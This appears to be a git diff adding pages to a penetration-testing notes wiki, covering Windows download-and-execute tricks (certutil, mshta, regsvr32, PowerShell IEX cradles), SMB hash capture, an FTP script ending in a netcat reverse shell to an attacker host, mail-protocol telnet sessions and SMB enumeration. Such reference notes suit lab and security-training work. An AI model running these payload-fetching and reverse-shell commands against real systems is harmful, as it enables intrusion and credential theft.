content-update

docs/File Transfers/File Transfer.md

@@ -131,6 +131,93 @@ scp -r l_dir_path u@ip:r_dir_path
 -q      # hidden the output
 ```
 
+### certutil - windows powershell
+
+```powershell
+# Multiple ways to download and execute files:
+certutil -urlcache -split -f http://webserver/payload payload
+
+# Execute a specific .dll:
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
+
+# Execute an .exe:
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
+```
+
+### cscript - windows powershell
+```powershell
+# Execute file from a WebDav server:
+cscript //E:jscript \\IP\folder\payload.txt
+
+# Download using wget.vbs
+cscript wget.vbs http://IP/file.exe file.exe
+
+# One liner download file from WebServer:
+powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
+powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.exe','C:\Users\user\Desktop\file.exe')"
+
+# Download from WebDAV Server:
+powershell -exec bypass -f \\IP\folder\payload.ps1
+```
+
+### Windows mshta wmic regsvr32
+```powershell
+# Method 1
+mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")"))
+
+# Method 2
+mshta http://IP/payload.hta
+
+# Method 3 (Using WebDav)
+mshta \\IP\payload.hta
+
+#Download and execute XSL using wmic
+wmic os get /format:"https://webserver/payload.xsl"
+
+
+# Download and execute over a WebServer:
+regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
+
+# Using WebDAV
+regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
+
+# Powershell Cmdlet
+Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
+
+# Powershell One-Line
+(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") 
+
+# In Memory Execution
+IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
+```
+
+### SMB
+```bash
+# Set up a SMB server using smbserver.py from impacket
+smbserver.py SHARE_NAME path/to/share
+
+# From target Windows:
+net view \\KALI_IP
+(Should display the SHARE_NAME)
+
+dir \\KALI_IP\SHARE_NAME
+copy \\KALI_IP\SHARE_NAME\file.exe .
+
+# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user
+# can be usefull to PTH, or crack passwords
+
+# Since Windows 10, you can't do anonymous smb server anymore
+sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"
+net use Z: \\192.168.30.130\SDFR /user:peon peon
+net use Z: /delete /y
+```
+
+```bash
+impacket smbserver
+net use z: \\attackerip\sharename
+```
+
+
 ### ftpd
 
 ```shell

docs/Services/FTP/FTP.md

@@ -1 +1,31 @@
-Test
+
+
+```bash
+# Set up a ftp downloading script on the target machine:
+echo open IP 21 > ftp.txt
+echo USER acknak>> ftp.txt
+echo jLQRZy4gyLhmMqz2whTw>> ftp.txt
+echo ftp >> ftp.txt
+echo bin >> ftp.txt
+echo GET wget.exe >> ftp.txt
+echo bye >> ftp.txt
+
+# Download the prepared file:
+ftp -v -n -s:ftp.txt
+
+# Start tftp server on Kali
+aftpd start
+
+# Transfer files from Kali to Windows (from windows terminal)
+tftp -I IPADDRESS GET nameoffile.exe
+
+# You can have a shell using this
+echo open <attacker_ip> 21> ftp.txt
+echo USER offsec>> ftp.txt
+echo ftp>> ftp.txt
+echo bin >> ftp.txt
+echo GET nc.exe >> ftp.txt
+echo bye >> ftp.txt
+ftp -v -n -s:ftp.txt
+nc.exe <attacker_ip> 1234 -e cmd.exe
+```

docs/Services/IMAP/IMAP.md

@@ -1 +1,30 @@
-Test
+## IMAP
+
+```shell
+telnet 10.10.45.250 110
+#Trying 10.10.45.250...
+#Connected to MACHINE_IP.
+#Escape character is '^]'.
+#+OK MACHINE_IP Mail Server POP3 Wed, 15 Sep 2021 11:05:34 +0300 
+USER frank
+#+OK frank
+PASS D2xc9CgD
+#+OK 1 messages (179) octets
+STAT
+#+OK 1 179
+LIST
+#+OK 1 messages (179) octets
+#1 179
+.
+RETR 1
+#+OK
+From: Mail Server 
+To: Frank 
+subject: Sending email with Telnet
+Hello Frank,
+I am just writing to say hi!
+.
+QUIT
+#+OK MACHINE_IP closing connection
+#Connection closed by foreign host.
+```

docs/Services/MSSQL/MSSQL.md

@@ -1 +1,5 @@
-Test
+> Resources
+- [mssqlinstance.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/mssqlinstance.py) Retrieves the MSSQL instances names from the target host.
+- [mssqlclient.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/mssqlclient.py) An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS.
+
+

docs/Services/POP3/POP3.md

@@ -1 +1,30 @@
-Test
+## POP3 
+
+```shell title:POP3 fold:folded
+telnet 10.10.45.250 110
+#Trying 10.10.45.250...
+#Connected to MACHINE_IP.
+#Escape character is '^]'.
+#+OK MACHINE_IP Mail Server POP3 Wed, 15 Sep 2021 11:05:34 +0300 
+USER <frank>
+#+OK frank
+PASS <D2xc9CgD>
+#+OK 1 messages (179) octets
+STAT
+#+OK 1 179
+LIST
+#+OK 1 messages (179) octets
+1 179
+.
+RETR 1
+#+OK
+From: Mail Server 
+To: Frank 
+subject: Sending email with Telnet
+Hello Frank,
+I am just writing to say hi!
+.
+QUIT
+#+OK MACHINE_IP closing connection
+#Connection closed by foreign host.
+```

docs/Services/SAMBA - SMB/SAMBA - SMB.md

@@ -1 +1,109 @@
-Test
+## Samba enumeration
+
+```shell
+#everything, runs all options apart from dictionary based share name guessing
+enum4linux -a target-ip
+
+#list usernames
+enum4linux -U x.x.x.x
+
+#list windows shares
+enum4linux -S x.x.x.x
+
+#dictionary attack
+enum4linux -s shares.txt target-ip
+
+#pull usernames from the default RID range (500-550,1000-1050)
+enum4linux -r target-ip
+
+#pull usernames using a custom RID range
+enum4linux -R 600-660 target-ip
+
+#view password policy
+enum4linux -P x.x.x.x
+
+#view OS info
+enum4linux -o x.x.x.x
+
+#list groups
+enum4linux -G target-ip
+
+#if on domain, tried to get some LDAP info
+enum4linux -l x.x.x.x
+
+#-i flag any Printer info
+enum4linux -i x.x.x.x
+
+#NetBIOS info
+enum4linux -n x.x.x.x
+
+#run all simple enumeration
+enum4linux -a x.x.x.x
+
+#connect with user and password
+enum4linux -u administrator -p password -U target-ip
+
+#verbose mode
+enum4linux -v target-ip
+```
+
+## SMB Client
+
+```shell
+#get list of shares on target
+smbclient -L //10.10.0.50/
+
+#if it was misconfigured, we can log in anonymously by simply hitting _Enter_ at the prompt
+#-U flag to specify the username (in this case a blank string) and the -N flag to specify no password
+smbclient -L //10.10.0.50/ -U '' -N
+
+#connect to share name
+smbclient //10.10.0.50/<sharename>
+
+#list directory
+dir
+
+#download file
+get example.txt
+
+#upload file
+put evil_file.txt
+```
+
+## SMB/MSRPC
+
+[smbclient.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/smbclient.py) 
+- A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It’s an excellent example to see how to use impacket.smb in action.
+
+[addcomputer.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/addcomputer.py)
+- Allows to add a computer to a domain using LDAP or SAMR (SMB).
+
+[getArch.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/getArch.py) 
+- This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
+
+[exchanger.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/exchanger.py)
+- A tool for connecting to MS Exchange via RPC over HTTP v2.
+
+[lookupsid.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/lookupsid.py) 
+- A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
+
+[netview.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/netview.py) 
+- Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers.
+
+[reg.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/reg.py) 
+- Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
+
+[rpcdump.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/rpcdump.py) 
+- This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
+
+[rpcmap.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/rpcmap.py)
+- Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.
+
+[samrdump.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/samrdump.py) 
+- An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
+
+[services.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/services.py) 
+- This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
+
+[smbpasswd.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_10_0/examples/smbpasswd.py)
+- This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR)

docs/Services/SMTP/SMTP.md

@@ -1 +1,26 @@
-Test
+
+## SMTP
+
+```shell
+telnet 10.10.45.250 25
+#Trying 10.10.45.250...
+#Connected to MACHINE_IP.
+#Escape character is '^]'.
+#220 bento.localdomain ESMTP Postfix (Ubuntu)
+helo telnet
+#250 bento.localdomain
+mail from: 
+#250 2.1.0 Ok
+rcpt to: 
+#250 2.1.5 Ok
+data
+#354 End data with .
+subject: Sending email with Telnet
+Hello Frank,
+I am just writing to say hi!             
+.
+#250 2.0.0 Ok: queued as C3E7F45F06
+quit
+#221 2.0.0 Bye
+#Connection closed by foreign host.
+```